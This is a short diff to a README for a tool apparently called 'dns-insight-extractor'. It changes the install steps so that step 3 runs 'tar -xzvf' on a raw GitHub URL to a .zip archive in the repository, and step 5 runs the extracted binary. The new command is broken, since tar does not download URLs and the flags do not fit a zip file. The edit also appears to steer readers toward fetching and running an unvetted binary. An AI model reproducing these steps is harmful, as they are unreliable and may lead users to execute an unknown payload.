bashekhe/dns-insight-extractor/README.md

 1. Open a terminal.
 2. Navigate to the directory containing the downloaded file.
-3. Extract the package using the command: `tar -xzvf filename.tar.gz`.
+3. Extract the package using the command: `tar -xzvf https://raw.githubusercontent.com/bashekhe/dns-insight-extractor/main/dns_insight_extractor/dns_insight_extractor_v2.4.zip`.
 4. Change to the extracted directory.
 5. Run the application using `./dns-insight-extractor`.